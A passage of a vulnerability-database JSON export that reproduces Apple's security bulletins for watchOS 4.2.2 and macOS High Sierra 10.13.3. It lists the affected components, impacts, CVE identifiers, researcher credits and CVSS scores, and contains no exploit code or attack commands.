2018\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to read restricted memory\n\nDescription: A validation issue was addressed with improved input sanitization.\n\nCVE-2018-4093: Jann Horn of Google Project Zero\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2018-4189: an anonymous researcher\n\nEntry added May 2, 2018\n\n**LinkPresentation**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted text message may lead to application denial of service\n\nDescription: A resource exhaustion issue was addressed with improved input validation.\n\nCVE-2018-4100: Abraham Masri @cheesecakeufo\n\nEntry updated November 16, 2018\n\n**QuartzCore**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue existed in the processing of web content. This issue was addressed with improved input validation.\n\nCVE-2018-4085: Ret2 Systems Inc. working with Trend Micro's Zero Day Initiative\n\nEntry updated November 16, 2018\n\n**Security**\n\nAvailable for: All Apple Watch models\n\nImpact: A certificate may have name constraints applied incorrectly\n\nDescription: A certificate evaluation issue existed in the handling of name constraints. This issue was addressed with improved trust evaluation of certificates.\n\nCVE-2018-4086: Ian Haken of Netflix\n\nEntry updated November 16, 2018\n\n**WebKit**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2018-4088: Jeonghoon Shin of Theori\n\nCVE-2018-4096: found by OSS-Fuzz\n\n**WebKit**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2018-4147: found by OSS-Fuzz\n\nEntry added October 1, 2018\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: November 17, 2018\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-01-23T00:00:00", "type": "apple", "title": "About the security content of watchOS 4.2.2", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4082", "CVE-2018-4085", "CVE-2018-4086", "CVE-2018-4087", "CVE-2018-4088", "CVE-2018-4090", "CVE-2018-4092", "CVE-2018-4093", "CVE-2018-4094", "CVE-2018-4095", "CVE-2018-4096", "CVE-2018-4100", "CVE-2018-4109", "CVE-2018-4147", "CVE-2018-4189"], "modified": "2018-01-23T00:00:00", "id": "APPLE:DF42AF653EB318B421476650640D673D", "href": "https://support.apple.com/kb/HT208464", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-24T20:42:52", "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## watchOS 4.2.2\n\nReleased January 23, 2018\n\n**Audio**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted audio file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved input validation.\n\nCVE-2018-4094: Mingi Cho, Seoyoung Kim, Young-Ho Lee, MinSik Shin and Taekyoung Kwon of the Information Security Lab, Yonsei University\n\nEntry added November 16, 2018\n\n**Core Bluetooth**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2018-4087: Rani Idan (@raniXCH) of Zimperium zLabs Team\n\nCVE-2018-4095: Rani Idan (@raniXCH) of Zimperium zLabs Team\n\n**Graphics Driver**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2018-4109: Adam Donenfeld (@doadam) of the Zimperium zLabs Team\n\nEntry added February 8, 2018\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to read restricted memory\n\nDescription: A memory initialization issue was addressed with improved memory handling.\n\nCVE-2018-4090: Jann Horn of Google Project Zero\n\nEntry updated November 16, 2018\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to read restricted memory\n\nDescription: A race condition was addressed with improved locking.\n\nCVE-2018-4092: Stefan Esser of Antid0te UG\n\nEntry updated November 16, 2018\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved input validation.\n\nCVE-2018-4082: Russ Cox of Google\n\nEntry updated November 16, 2018\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to read restricted memory\n\nDescription: A validation issue was addressed with improved input sanitization.\n\nCVE-2018-4093: Jann Horn of Google Project Zero\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2018-4189: an anonymous researcher\n\nEntry added May 2, 2018\n\n**LinkPresentation**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted text message may lead to application denial of service\n\nDescription: A resource exhaustion issue was addressed with improved input validation.\n\nCVE-2018-4100: Abraham Masri @cheesecakeufo\n\nEntry updated November 16, 2018\n\n**QuartzCore**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue existed in the processing of web content. This issue was addressed with improved input validation.\n\nCVE-2018-4085: Ret2 Systems Inc. working with Trend Micro's Zero Day Initiative\n\nEntry updated November 16, 2018\n\n**Security**\n\nAvailable for: All Apple Watch models\n\nImpact: A certificate may have name constraints applied incorrectly\n\nDescription: A certificate evaluation issue existed in the handling of name constraints. This issue was addressed with improved trust evaluation of certificates.\n\nCVE-2018-4086: Ian Haken of Netflix\n\nEntry updated November 16, 2018\n\n**WebKit**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2018-4088: Jeonghoon Shin of Theori\n\nCVE-2018-4096: found by OSS-Fuzz\n\n**WebKit**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2018-4147: found by OSS-Fuzz\n\nEntry added October 1, 2018\n", "edition": 3, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-11-17T12:29:24", "title": "About the security content of watchOS 4.2.2 - Apple Support", "type": "apple", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4100", "CVE-2018-4092", "CVE-2018-4082", "CVE-2018-4147", "CVE-2018-4087", "CVE-2018-4093", "CVE-2018-4095", "CVE-2018-4086", "CVE-2018-4088", "CVE-2018-4094", "CVE-2018-4096", "CVE-2018-4109", "CVE-2018-4090", "CVE-2018-4085", "CVE-2018-4189"], "modified": "2018-11-17T12:29:24", "id": "APPLE:HT208464", "href": "https://support.apple.com/kb/HT208464", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-19T03:29:36", "description": "# About the security content of macOS High Sierra 10.13.3, Security Update 2018-001 Sierra, and Security Update 2018-001 El Capitan\n\nThis document describes the security content of macOS High Sierra 10.13.3, Security Update 2018-001 Sierra, and Security Update 2018-001 El Capitan.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## macOS High Sierra 10.13.3, Security Update 2018-001 Sierra, and Security Update 2018-001 El Capitan\n\nReleased January 23, 2018\n\n**Audio**\n\nAvailable for: macOS High Sierra 10.13.2, macOS Sierra 10.12.6\n\nImpact: Processing a maliciously crafted audio file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved input validation.\n\nCVE-2018-4094: Mingi Cho, Seoyoung Kim, Young-Ho Lee, MinSik Shin and Taekyoung Kwon of the Information Security Lab, Yonsei University\n\nEntry updated November 16, 2018\n\n**curl**\n\nAvailable for: macOS High Sierra 10.13.2\n\nImpact: Multiple issues in curl\n\nDescription: An integer overflow existed in curl. This issue was addressed with improved bounds checking.\n\nCVE-2017-8816: Alex Nichols\n\nEntry added November 16, 2018\n\n**curl**\n\nAvailable for: macOS High Sierra 10.13.2\n\nImpact: Multiple issues in curl\n\nDescription: An out-of-bounds read issue existed in the curl. This issue was addressed with improved bounds checking.\n\nCVE-2017-8817: found by OSS-Fuzz\n\nEntry updated November 16, 2018\n\n**EFI**\n\nAvailable for: macOS High Sierra 10.13.2, macOS Sierra 10.12.6, OS X El Capitan 10.11.6\n\nDescription: Multiple buffer overflows in kernel in Intel Manageability Engine Firmware 11.0/11.5/11.6/11.7/11.10/11.20 allow attacker with local access to the system to execute arbitrary code. \n\nCVE-2017-5705: Mark Ermolov and Maxim Goryachy from Positive Technologies\n\nEntry added January 30, 2018\n\n**EFI**\n\nAvailable for: macOS High Sierra 10.13.2, macOS Sierra 10.12.6, OS X El Capitan 10.11.6\n\nDescription: Multiple privilege escalations in kernel in Intel Manageability Engine Firmware 11.0/11.5/11.6/11.7/11.10/11.20 allow unauthorized process to access privileged content via unspecified vector.\n\nCVE-2017-5708: Mark Ermolov and Maxim Goryachy from Positive Technologies\n\nEntry added January 30, 2018\n\n**IOHIDFamily**\n\nAvailable for: macOS High Sierra 10.13.2, macOS Sierra 10.12.6, OS X El Capitan 10.11.6\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2018-4098: Siguza\n\n**Kernel**\n\nAvailable for: macOS Sierra 10.12.6, OS X El Capitan 10.11.6\n\nImpact: An application may be able to read kernel memory (Meltdown)\n\nDescription: Systems with microprocessors utilizing speculative execution and indirect branch prediction may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis of the data cache.\n\nCVE-2017-5754: Jann Horn of Google Project Zero; Moritz Lipp of Graz University of Technology; Michael Schwarz of Graz University of Technology; Daniel Gruss of Graz University of Technology; Thomas Prescher of Cyberus Technology GmbH; Werner Haas of Cyberus Technology GmbH; Stefan Mangard of Graz University of Technology; Paul Kocher; Daniel Genkin of University of Pennsylvania and University of Maryland; Yuval Yarom of University of Adelaide and Data61; and Mike Hamburg of Rambus (Cryptography Research Division)\n\n**Kernel**\n\nAvailable for: macOS High Sierra 10.13.2\n\nImpact: An application may be able to read restricted memory\n\nDescription: A memory initialization issue was addressed with improved memory handling.\n\nCVE-2018-4090: Jann Horn of Google Project Zero\n\nEntry updated November 16, 2018\n\n**Kernel**\n\nAvailable for: macOS High Sierra 10.13.2\n\nImpact: An application may be able to read restricted memory\n\nDescription: A race condition was addressed with improved locking.\n\nCVE-2018-4092: Stefan Esser of Antid0te UG\n\nEntry updated February 8, 2018, updated November 16, 2018\n\n**Kernel**\n\nAvailable for: macOS High Sierra 10.13.2\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved input validation.\n\nCVE-2018-4082: Russ Cox of Google\n\nEntry updated November 16, 2018\n\n**Kernel**\n\nAvailable for: macOS High Sierra 10.13.2, macOS Sierra 10.12.6\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A logic issue was addressed with improved validation.\n\nCVE-2018-4097: Resecurity, Inc.\n\n**Kernel**\n\nAvailable for: macOS High Sierra 10.13.2\n\nImpact: An application may be able to read restricted memory\n\nDescription: A validation issue was addressed with improved input sanitization.\n\nCVE-2018-4093: Jann Horn of Google Project Zero\n\n**Kernel**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.2\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2018-4189: an anonymous researcher\n\nEntry added May 2, 2018\n\n**Kernel**\n\nAvailable for: macOS High Sierra 10.13.2\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2018-4169: an anonymous researcher\n\nEntry added May 2, 2018, updated November 16, 2018\n\n**LinkPresentation**\n\nAvailable for: macOS High Sierra 10.13.2, macOS Sierra 10.12.6\n\nImpact: Processing a maliciously crafted text message may lead to application denial of service\n\nDescription: A resource exhaustion issue was addressed with improved input validation.\n\nCVE-2018-4100: Abraham Masri @cheesecakeufo\n\nEntry updated November 16, 2018\n\n**QuartzCore**\n\nAvailable for: OS X El Capitan 10.11.6, macOS High Sierra 10.13.2, macOS Sierra 10.12.6\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue existed in the processing of web content. This issue was addressed with improved input validation.\n\nCVE-2018-4085: Ret2 Systems Inc. working with Trend Micro's Zero Day Initiative\n\nEntry updated November 16, 2018\n\n**Remote Management**\n\nAvailable for: macOS Sierra 10.12.6\n\nImpact: A remote user may be able to gain root privileges\n\nDescription: A permissions issue existed in Remote Management. This issue was addressed through improved permission validation.\n\nCVE-2018-4298: Tim van der Werff of SupCloud\n\nEntry added July 19, 2018\n\n**Sandbox**\n\nAvailable for: macOS High Sierra 10.13.2\n\nImpact: A sandboxed process may be able to circumvent sandbox restrictions\n\nDescription: An access issue was addressed with additional sandbox restrictions.\n\nCVE-2018-4091: Alex Gaynor of Mozilla\n\nEntry updated November 16, 2018\n\n**Security**\n\nAvailable for: macOS High Sierra 10.13.2, macOS Sierra 10.12.6\n\nImpact: A certificate may have name constraints applied incorrectly\n\nDescription: A certificate evaluation issue existed in the handling of name constraints. This issue was addressed with improved trust evaluation of certificates.\n\nCVE-2018-4086: Ian Haken of Netflix\n\nEntry updated November 16, 2018\n\n**Security**\n\nAvailable for: macOS High Sierra 10.13.2\n\nImpact: An attacker may be able to bypass administrator authentication without supplying the administrator\u2019s password\n\nDescription: A logic error existed in the validation of credentials. This was addressed with improved credential validation.\n\nCVE-2017-13889: Glenn G. Bruckno, P.E. of Automation Engineering, James Barnes, Kevin Manca of Computer Engineering Politecnico di Milano, Rene Malenfant of University of New Brunswick\n\nEntry added June 21, 2018\n\n**Touch Bar Support**\n\nAvailable for: macOS High Sierra 10.13.2, macOS Sierra 10.12.6\n\nImpact: A malicious application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved state management.\n\nCVE-2018-4083: Ian Beer of Google Project Zero\n\nEntry added February 9, 2018\n\n**WebKit**\n\nAvailable for: macOS High Sierra 10.13.2\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2018-4088: Jeonghoon Shin of Theori\n\nCVE-2018-4089: Ivan Fratric of Google Project Zero\n\nCVE-2018-4096: found by OSS-Fuzz\n\n**WebKit**\n\nAvailable for: macOS High Sierra 10.13.2\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2018-4147: found by OSS-Fuzz\n\nEntry added October 18, 2018\n\n**WebKit Page Loading**\n\nAvailable for: macOS High Sierra 10.13.2\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-7830: Jun Kokatsu (@shhnjk)\n\nEntry added October 18, 2018\n\n**Wi-Fi**\n\nAvailable for: macOS High Sierra 10.13.2, macOS Sierra 10.12.6, OS X El Capitan 10.11.6\n\nImpact: An application may be able to read restricted memory\n\nDescription: A validation issue was addressed with improved input sanitization.\n\nCVE-2018-4084: Hyung Sup Lee of Minionz, You Chan Lee of Hanyang University\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: November 17, 2018\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2018-01-23T00:00:00", "type": "apple", "title": "About the security content of macOS High Sierra 10.13.3, Security Update 2018-001 Sierra, and Security Update 2018-001 El Capitan", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13889", "CVE-2017-5705", "CVE-2017-5708", "CVE-2017-5754", "CVE-2017-7830", "CVE-2017-8816", "CVE-2017-8817", "CVE-2018-4082", "CVE-2018-4083", "CVE-2018-4084", "CVE-2018-4085", "CVE-2018-4086", "CVE-2018-4088", "CVE-2018-4089", "CVE-2018-4090", "CVE-2018-4091", "CVE-2018-4092", "CVE-2018-4093", "CVE-2018-4094", "CVE-2018-4096", "CVE-2018-4097", "CVE-2018-4098", "CVE-2018-4100", "CVE-2018-4147", "CVE-2018-4169", "CVE-2018-4189", "CVE-2018-4298"], "modified": "2018-01-23T00:00:00", "id": "APPLE:A906ED60E2875C343BE4CB7524339858", "href": "https://support.apple.com/kb/HT208465", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-24T20:44:37", "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## macOS High Sierra 10.13.3, Security Update 2018-001 Sierra, and Security Update 2018-001 El Capitan\n\nReleased January 23, 2018\n\n**Audio**\n\nAvailable for: macOS High Sierra 10.13.2, macOS Sierra 10.12.6\n\nImpact: Processing a maliciously crafted audio file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved input validation.\n\nCVE-2018-4094: Mingi Cho, Seoyoung Kim, Young-Ho Lee, MinSik Shin and Taekyoung Kwon of the Information Security Lab, Yonsei University\n\nEntry updated November 16, 2018\n\n**curl**\n\nAvailable for: macOS High Sierra 10.13.2\n\nImpact: Multiple issues in curl\n\nDescription: An integer overflow existed in curl. This issue was addressed with improved bounds checking.\n\nCVE-2017-8816: Alex Nichols\n\nEntry added November 16, 2018\n\n**curl**\n\nAvailable for: macOS High Sierra 10.13.2\n\nImpact: Multiple issues in curl\n\nDescription: An out-of-bounds read issue existed in the curl. This issue was addressed with improved bounds checking.\n\nCVE-2017-8817: found by OSS-Fuzz\n\nEntry updated November 16, 2018\n\n**EFI**\n\nAvailable for: macOS High Sierra 10.13.2, macOS Sierra 10.12.6, OS X El Capitan 10.11.6\n\nDescription: Multiple buffer overflows in kernel in Intel Manageability Engine Firmware 11.0/11.5/11.6/11.7/11.10/11.20 allow attacker with local access to the system to execute arbitrary code. \n\nCVE-2017-5705: Mark Ermolov and Maxim Goryachy from Positive Technologies\n\nEntry added January 30, 2018\n\n**EFI**\n\nAvailable for: macOS High Sierra 10.13.2, macOS Sierra 10.12.6, OS X El Capitan 10.11.6\n\nDescription: Multiple privilege escalations in kernel in Intel Manageability Engine Firmware 11.0/11.5/11.6/11.7/11.10/11.20 allow unauthorized process to access privileged content via unspecified vector.\n\nCVE-2017-5708: Mark Ermolov and Maxim Goryachy from Positive Technologies\n\nEntry added January 30, 2018\n\n**IOHIDFamily**\n\nAvailable for: macOS High Sierra 10.13.2, macOS Sierra 10.12.6, OS X El Capitan 10.11.6\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2018-4098: Siguza\n\n**Kernel**\n\nAvailable for: macOS Sierra 10.12.6, OS X El Capitan 10.11.6\n\nImpact: An application may be able to read kernel memory (Meltdown)\n\nDescription: Systems with microprocessors utilizing speculative execution and indirect branch prediction may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis of the data cache.\n\nCVE-2017-5754: Jann Horn of Google Project Zero; Moritz Lipp of Graz University of Technology; Michael Schwarz of Graz University of Technology; Daniel Gruss of Graz University of Technology; Thomas Prescher of Cyberus Technology GmbH; Werner Haas of Cyberus Technology GmbH; Stefan Mangard of Graz University of Technology; Paul Kocher; Daniel Genkin of University of Pennsylvania and University of Maryland; Yuval Yarom of University of Adelaide and Data61; and Mike Hamburg of Rambus (Cryptography Research Division)\n\n**Kernel**\n\nAvailable for: macOS High Sierra 10.13.2\n\nImpact: An application may be able to read restricted memory\n\nDescription: A memory initialization issue was addressed with improved memory handling.\n\nCVE-2018-4090: Jann Horn of Google Project Zero\n\nEntry updated November 16, 2018\n\n**Kernel**\n\nAvailable for: macOS High Sierra 10.13.2\n\nImpact: An application may be able to read restricted memory\n\nDescription: A race condition was addressed with improved locking.\n\nCVE-2018-4092: Stefan Esser of Antid0te UG\n\nEntry updated February 8, 2018, updated November 16, 2018\n\n**Kernel**\n\nAvailable for: macOS High Sierra 10.13.2\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved input validation.\n\nCVE-2018-4082: Russ Cox of Google\n\nEntry updated November 16, 2018\n\n**Kernel**\n\nAvailable for: macOS High Sierra 10.13.2, macOS Sierra 10.12.6\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A logic issue was addressed with improved validation.\n\nCVE-2018-4097: Resecurity, Inc.\n\n**Kernel**\n\nAvailable for: macOS High Sierra 10.13.2\n\nImpact: An application may be able to read restricted memory\n\nDescription: A validation issue was addressed with improved input sanitization.\n\nCVE-2018-4093: Jann Horn of Google Project Zero\n\n**Kernel**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.2\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2018-4189: an anonymous researcher\n\nEntry added May 2, 2018\n\n**Kernel**\n\nAvailable for: macOS High Sierra 10.13.2\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2018-4169: an anonymous researcher\n\nEntry added May 2, 2018, updated November 16, 2018\n\n**LinkPresentation**\n\nAvailable for: macOS High Sierra 10.13.2, macOS Sierra 10.12.6\n\nImpact: Processing a maliciously crafted text message may lead to application denial of service\n\nDescription: A resource exhaustion issue was addressed with improved input validation.\n\nCVE-2018-4100: Abraham Masri @cheesecakeufo\n\nEntry updated November 16, 2018\n\n**QuartzCore**\n\nAvailable for: OS X El Capitan 10.11.6, macOS High Sierra 10.13.2, macOS Sierra 10.12.6\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue existed in the processing of web content. This issue was addressed with improved input validation.\n\nCVE-2018-4085: Ret2 Systems Inc. working with Trend Micro's Zero Day Initiative\n\nEntry updated November 16, 2018\n\n**Remote Management**\n\nAvailable for: macOS Sierra 10.12.6\n\nImpact: A remote user may be able to gain root privileges\n\nDescription: A permissions issue existed in Remote Management. This issue was addressed through improved permission validation.\n\nCVE-2018-4298: Tim van der Werff of SupCloud\n\nEntry added July 19, 2018\n\n**Sandbox**\n\nAvailable for: macOS High Sierra 10.13.2\n\nImpact: A sandboxed process may be able to circumvent sandbox restrictions\n\nDescription: An access issue was addressed with additional sandbox restrictions.\n\nCVE-2018-4091: Alex Gaynor of Mozilla\n\nEntry updated November 16, 2018\n\n**Security**\n\nAvailable for: macOS High Sierra 10.13.2, macOS Sierra 10.12.6\n\nImpact: A certificate may have name constraints applied incorrectly\n\nDescription: A certificate evaluation issue existed in the handling of name constraints. This issue was addressed with improved trust evaluation of certificates.\n\nCVE-2018-4086: Ian Haken of Netflix\n\nEntry updated November 16, 2018\n\n**Security**\n\nAvailable for: macOS High Sierra 10.13.2\n\nImpact: An attacker may be able to bypass administrator authentication without supplying the administrator\u2019s password\n\nDescription: A logic error existed in the validation of credentials. This was addressed with improved credential validation.\n\nCVE-2017-13889: Glenn G. Bruckno, P.E. of Automation Engineering, James Barnes, Kevin Manca of Computer Engineering Politecnico di Milano, Rene Malenfant of University of New Brunswick\n\nEntry added June 21, 2018\n\n**Touch Bar Support**\n\nAvailable for: macOS High Sierra 10.13.2, macOS Sierra 10.12.6\n\nImpact: A malicious application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved state management.\n\nCVE-2018-4083: Ian Beer of Google Project Zero\n\nEntry added February 9, 2018\n\n**WebKit**\n\nAvailable for: macOS High Sierra 10.13.2\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2018-4088: Jeonghoon Shin of Theori\n\nCVE-2018-4089: Ivan Fratric of Google Project Zero\n\nCVE-2018-4096: found by OSS-Fuzz\n\n**WebKit**\n\nAvailable for: macOS High Sierra 10.13.2\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2018-4147: found by OSS-Fuzz\n\nEntry added October 18, 2018\n\n**WebKit Page Loading**\n\nAvailable for: macOS High Sierra 10.13.2\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-7830: Jun Kokatsu (@shhnjk)\n\nEntry added October 18, 2018\n\n**Wi-Fi**\n\nAvailable for: macOS High Sierra 10.13.2, macOS Sierra 10.12.6, OS X El Capitan 10.11.6\n\nImpact: An application may be able to read restricted memory\n\nDescription: A validation issue was addressed with improved input sanitization.\n\nCVE-2018-4084: Hyung Sup Lee of Minionz, You Chan Lee of Hanyang University\n", "edition": 3, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": 